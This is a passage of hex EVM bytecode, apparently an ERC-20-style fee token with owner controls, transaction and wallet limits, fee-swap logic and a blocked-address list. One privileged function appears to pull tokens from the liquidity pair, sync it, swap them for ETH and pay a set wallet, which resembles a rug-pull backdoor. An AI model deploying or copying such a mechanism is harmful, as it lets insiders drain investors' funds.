1d6020528060005260406000206000915054906101000a900460ff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600254905090565b610d6b6126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610dfa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df190614771565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f0db17895a9d092fb3ca24d626f2150dd80c185b0706b36f1040ee239f56cb87160405160405180910390a380600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b610ece6126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f5490614771565b60405180910390fd5b670de0b6b3a76400006103e86001610f73610d59565b610f7d91906147c0565b610f879190614849565b610f919190614849565b811015610fd3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fca906148ec565b60405180910390fd5b670de0b6b3a764000081610fe791906147c0565b60088190555050565b6000610ffd84848461288a565b6110be846110096126b9565b6110b9856040518060600160405280602881526020016158b260289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061106f6126b9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546136059092919063ffffffff16565b6126c1565b600190509392505050565b60006012905090565b600061117b6110df6126b9565b8461117685600160006110f06126b9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461265b90919063ffffffff16565b6126c1565b6001905092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b600b60009054906101000a900460ff1681565b6000601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b60155481565b600b60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112816126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611310576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161130790614771565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113db6126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461146a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161146190614771565b60405180910390fd5b6000600b60006101000a81548160ff0219169083151502179055506001905090565b6114946126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611523576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161151a90614771565b60405180910390fd5b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6115866126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611615576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160c90614771565b60405180910390fd5b82601181905550816012819055508060138190555060135460125460115461163d919061490c565b611647919061490c565b601081905550600a6010541115611693576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168a906149ae565b60405180910390fd5b505050565b6116a06126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461172f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161172690614771565b60405180910390fd5b6001600b60016101000a81548160ff0219169083151502179055506001600b60026101000a81548160ff02191690831515021790555043601b81905550565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6117a06126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461182f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161182690614771565b60405180910390fd5b80600b60026101000a81548160ff02191690831515021790555050565b60606004805461185b906146f4565b80601f0160208091040260200160405190810160405280929190818152602001828054611887906146f4565b80156118d45780601f106118a9576101008083540402835291602001916118d4565b820191906000526020600020905b8154815290600101906020018083116118b757829003601f168201915b5050505050905090565b6118e66126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611975576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161196c90614771565b60405180910390fd5b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a03576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119fa90614a40565b60405180910390fd5b611a0d8282613669565b5050565b60135481565b601a5481565b60175481565b6000611ae6611a306126b9565b84611ae1856040518060600160405280602581526020016158da6025913960016000611a5a6126b9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546136059092919063ffffffff16565b6126c1565b6001905092915050565b60115481565b6000611b0a611b036126b9565b848461288a565b6001905092915050565b611b1c6126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611bab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ba290614771565b60405180910390fd5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8616c7a330e3cf61290821331585511f1e2778171e2b005fb5ec60cfe874dc6760405160405180910390a380600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601e6020528060005260406000206000915054906101000a900460ff1681565b600b60019054906101000a900460ff1681565b611ca66126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d35576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d2c90614771565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611dd2919061438c565b60405180910390a25050565b611de66126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611e75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e6c90614771565b60405180910390fd5b826015819055508160168190555080601781905550601754601654601554611e9d919061490c565b611ea7919061490c565b601481905550600a6014541115611ef3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611eea906149ae565b60405180910390fd5b505050565b611f006126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611f8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f8690614771565b60405180910390fd5b670de0b6b3a76400006103e86001611fa5610d59565b611faf91906147c0565b611fb99190614849565b611fc39190614849565b811015612005576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ffc90614ad2565b60405180910390fd5b670de0b6b3a76400008161201991906147c0565b600a8190555050565b600f60009054906101000a900460ff1681565b60085481565b60006120456126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146120d4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120cb90614771565b60405180910390fd5b620186a060016120e2610d59565b6120ec91906147c0565b6120f69190614849565b821015612138576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161212f90614b64565b60405180910390fd5b6103e86005612145610d59565b61214f91906147c0565b6121599190614849565b82111561219b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219290614bf6565b60405180910390fd5b8160098190555060019050919050565b60105481565b6000601c60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661220957600080fd5b60006122347f0000000000000000000000000000000000000000000000000000000000000000611231565b9050600183118015612251575060648161224e9190614849565b83105b612290576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161228790614c62565b60405180910390fd5b6122998361370a565b6122a2846137d6565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16476040516122ea90614cb3565b60006040518083038185875af1925050503d8060008114612327576040519150601f19603f3d011682016040523d82523d6000602084013e61232c565b606091505b50509050809250505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b60095481565b60006123d26126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612461576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161245890614771565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124916126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612520576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161251790614771565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361258f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161258690614d3a565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600a5481565b600080828461266a919061490c565b9050838110156126af576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126a690614da6565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612730576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161272790614e38565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361279f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161279690614eca565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161287d919061445d565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036128f9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016128f090614f5c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612968576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161295f90614fee565b60405180910390fd5b600e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015612a0c5750600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b612a4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a4290615080565b60405180910390fd5b60008103612a6457612a5f83836000613a13565b613600565b600b60009054906101000a900460ff161561312857612a8161176e565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612aef5750612abf61176e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612b285750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612b62575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612b7b5750600560149054906101000a900460ff16155b1561312757600b60019054906101000a900460ff16612c7557601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612c355750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612c74576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c6b906150ec565b60405180910390fd5b5b600f60009054906101000a900460ff1615612e3e57612c9261176e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614158015612d1957507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612d7157507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b15612e3d5743600c60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541115612df8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612def906151a4565b60405180910390fd5b43600c60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b601e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612ee15750601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f8857600854811115612f2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612f2290615236565b60405180910390fd5b600a54612f3783611231565b82612f42919061490c565b1115612f83576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612f7a906152a2565b60405180910390fd5b613126565b601e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561302b5750601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561307a57600854811115613075576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161306c90615334565b60405180910390fd5b613125565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661312457600a546130d783611231565b826130e2919061490c565b1115613123576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161311a906152a2565b60405180910390fd5b5b5b5b5b5b600061313330611231565b9050600060095482101590508080156131585750600b60029054906101000a900460ff165b80156131715750600560149054906101000a900460ff16155b80156131c75750601e60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561321d5750601c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156132735750601c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156132b7576001600560146101000a81548160ff02191690831515021790555061329b613ca6565b6000600560146101000a81548160ff0219169083151502179055505b6000600560149054906101000a900460ff16159050601c60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061336d5750601c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561337757600090505b600081156135f057601e60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156133da57506000601454115b156134a75761340760646133f960145488613f8d90919063ffffffff16565b61400790919063ffffffff16565b90506014546016548261341a91906147c0565b6134249190614849565b60196000828254613435919061490c565b925050819055506014546017548261344d91906147c0565b6134579190614849565b601a6000828254613468919061490c565b925050819055506014546015548261348091906147c0565b61348a9190614849565b6018600082825461349b919061490c565b925050819055506135cc565b601e60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561350257506000601054115b156135cb5761352f606461352160105488613f8d90919063ffffffff16565b61400790919063ffffffff16565b90506010546012548261354291906147c0565b61354c9190614849565b6019600082825461355d919061490c565b925050819055506010546013548261357591906147c0565b61357f9190614849565b601a6000828254613590919061490c565b92505081905550601054601154826135a891906147c0565b6135b29190614849565b601860008282546135c3919061490c565b925050819055505b5b60008111156135e1576135e0873083613a13565b5b80856135ed9190615354565b94505b6135fb878787613a13565b505050505b505050565b600083831115829061364d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016136449190614276565b60405180910390fd5b506000838561365c9190615354565b9050809150509392505050565b80601e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b6137537f0000000000000000000000000000000000000000000000000000000000000000306137376110c9565b600a61374391906154bb565b8461374e91906147c0565b61288a565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156137bb57600080fd5b505af11580156137cf573d6000803e3d6000fd5b5050505050565b6000600267ffffffffffffffff8111156137f3576137f2615506565b5b6040519080825280602002602001820160405280156138215781602001602082028036833780820191505090505b509050308160008151811061383957613838615535565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156138de573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906139029190615579565b8160018151811061391657613915615535565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505061397b307f0000000000000000000000000000000000000000000000000000000000000000846126c1565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016139dd95949392919061569f565b600060405180830381600087803b1580156139f757600080fd5b505af1158015613a0b573d6000803e3d6000fd5b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603613a82576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613a7990614f5c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603613af1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613ae890614fee565b60405180910390fd5b613afc838383614051565b613b678160405180606001604052806026815260200161588c602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546136059092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550613bfa816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461265b90919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051613c99919061445d565b60405180910390a3505050565b6000613cb130611231565b90506000601a54601854601954613cc8919061490c565b613cd2919061490c565b9050600080831480613ce45750600082145b15613cf157505050613f8b565b6014600954613d0091906147c0565b831115613d19576014600954613d1691906147c0565b92505b600060028360195486613d2c91906147c0565b613d369190614849565b613d409190614849565b90506000613d57828661405690919063ffffffff16565b90506000479050613d67826137d6565b6000613d7c824761405690919063ffffffff16565b90506000613da787613d9960185485613f8d90919063ffffffff16565b61400790919063ffffffff16565b90506000613dd288613dc4601a5486613f8d90919063ffffffff16565b61400790919063ffffffff16565b90506000818385613de39190615354565b613ded9190615354565b9050600060198190555060006018819055506000601a81905550600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051613e4d90614cb3565b60006040518083038185875af1925050503d8060008114613e8a576040519150601f19603f3d011682016040523d82523d6000602084013e613e8f565b606091505b505080985050600087118015613ea55750600081115b15613ef257613eb487826140a0565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5618682601954604051613ee9939291906156f9565b60405180910390a15b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051613f3890614cb3565b60006040518083038185875af1925050503d8060008114613f75576040519150601f19603f3d011682016040523d82523d6000602084013e613f7a565b606091505b505080985050505050505050505050505b565b6000808303613f9f5760009050614001565b60008284613fad91906147c0565b9050828482613fbc9190614849565b14613ffc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613ff3906157a2565b60405180910390fd5b809150505b92915050565b600061404983836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061417a565b905092915050565b505050565b600061409883836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250613605565b905092915050565b6140cb307f0000000000000000000000000000000000000000000000000000000000000000846126c1565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d71982308560008030426040518863ffffffff1660e01b8152600401614130969594939291906157c2565b60606040518083038185885af115801561414e573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906141739190615838565b5050505050565b600080831182906141c1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016141b89190614276565b60405180910390fd5b50600083856141d09190614849565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156142175780820151818401526020810190506141fc565b83811115614226576000848401525b50505050565b6000601f19601f8301169050919050565b6000614248826141dd565b61425281856141e8565b93506142628185602086016141f9565b61426b8161422c565b840191505092915050565b60006020820190508181036000830152614290818461423d565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006142c88261429d565b9050919050565b6142d8816142bd565b81146142e357600080fd5b50565b6000813590506142f5816142cf565b92915050565b6000819050919050565b61430e816142fb565b811461431957600080fd5b50565b60008135905061432b81614305565b92915050565b6000806040838503121561434857614347614298565b5b6000614356858286016142e6565b92505060206143678582860161431c565b9150509250929050565b60008115159050919050565b61438681614371565b82525050565b60006020820190506143a1600083018461437d565b92915050565b6000602082840312156143bd576143bc614298565b5b60006143cb848285016142e6565b91505092915050565b6000819050919050565b60006143f96143f46143ef8461429d565b6143d4565b61429d565b9050919050565b600061440b826143de565b9050919050565b600061441d82614400565b9050919050565b61442d81614412565b82525050565b60006020820190506144486000830184614424565b92915050565b614457816142fb565b82525050565b6000602082019050614472600083018461444e565b92915050565b60006020828403121561448e5761448d614298565b5b600061449c8482850161431c565b91505092915050565b6000806000606084860312156144be576144bd614298565b5b60006144cc868287016142e6565b93505060206144dd868287016142e6565b92505060406144ee8682870161431c565b9150509250925092565b600060ff82169050919050565b61450e816144f8565b82525050565b60006020820190506145296000830184614505565b92915050565b614538816142bd565b82525050565b6000602082019050614553600083018461452f565b92915050565b61456281614371565b811461456d57600080fd5b50565b60008135905061457f81614559565b92915050565b6000806040838503121561459c5761459b614298565b5b60006145aa858286016142e6565b92505060206145bb85828601614570565b9150509250929050565b6000806000606084860312156145de576145dd614298565b5b60006145ec8682870161431c565b93505060206145fd8682870161431c565b925050604061460e8682870161431c565b9150509250925092565b60006020828403121561462e5761462d614298565b5b600061463c84828501614570565b91505092915050565b6000806040838503121561465c5761465b614298565b5b600061466a8582860161431c565b925050602061467b8582860161431c565b9150509250929050565b6000806040838503121561469c5761469b614298565b5b60006146aa858286016142e6565b92505060206146bb858286016142e6565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061470c57607f821691505b60208210810361471f5761471e6146c5565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061475b6020836141e8565b915061476682614725565b602082019050919050565b6000602082019050818103600083015261478a8161474e565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006147cb826142fb565b91506147d6836142fb565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561480f5761480e614791565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000614854826142fb565b915061485f836142fb565b92508261486f5761486e61481a565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b60006148d6602f836141e8565b91506148e18261487a565b604082019050919050565b60006020820190508181036000830152614905816148c9565b9050919050565b6000614917826142fb565b9150614922836142fb565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561495757614956614791565b5b828201905092915050565b7f4d757374206b656570206665657320617420313025206f72206c657373000000600082015250565b6000614998601d836141e8565b91506149a382614962565b602082019050919050565b600060208201905081810360008301526149c78161498b565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b6000614a2a6039836141e8565b9150614a35826149ce565b604082019050919050565b60006020820190508181036000830152614a5981614a1d565b9050919050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b6000614abc6024836141e8565b9150614ac782614a60565b604082019050919050565b60006020820190508181036000830152614aeb81614aaf565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b6000614b4e6035836141e8565b9150614b5982614af2565b604082019050919050565b60006020820190508181036000830152614b7d81614b41565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b6000614be06034836141e8565b9150614beb82614b84565b604082019050919050565b60006020820190508181036000830152614c0f81614bd3565b9050919050565b7f616d6f756e742065786365656465640000000000000000000000000000000000600082015250565b6000614c4c600f836141e8565b9150614c5782614c16565b602082019050919050565b60006020820190508181036000830152614c7b81614c3f565b9050919050565b600081905092915050565b50565b6000614c9d600083614c82565b9150614ca882614c8d565b600082019050919050565b6000614cbe82614c90565b9150819050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614d246026836141e8565b9150614d2f82614cc8565b604082019050919050565b60006020820190508181036000830152614d5381614d17565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000614d90601b836141e8565b9150614d9b82614d5a565b602082019050919050565b60006020820190508181036000830152614dbf81614d83565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000614e226024836141e8565b9150614e2d82614dc6565b604082019050919050565b60006020820190508181036000830152614e5181614e15565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000614eb46022836141e8565b9150614ebf82614e58565b604082019050919050565b60006020820190508181036000830152614ee381614ea7565b9050919050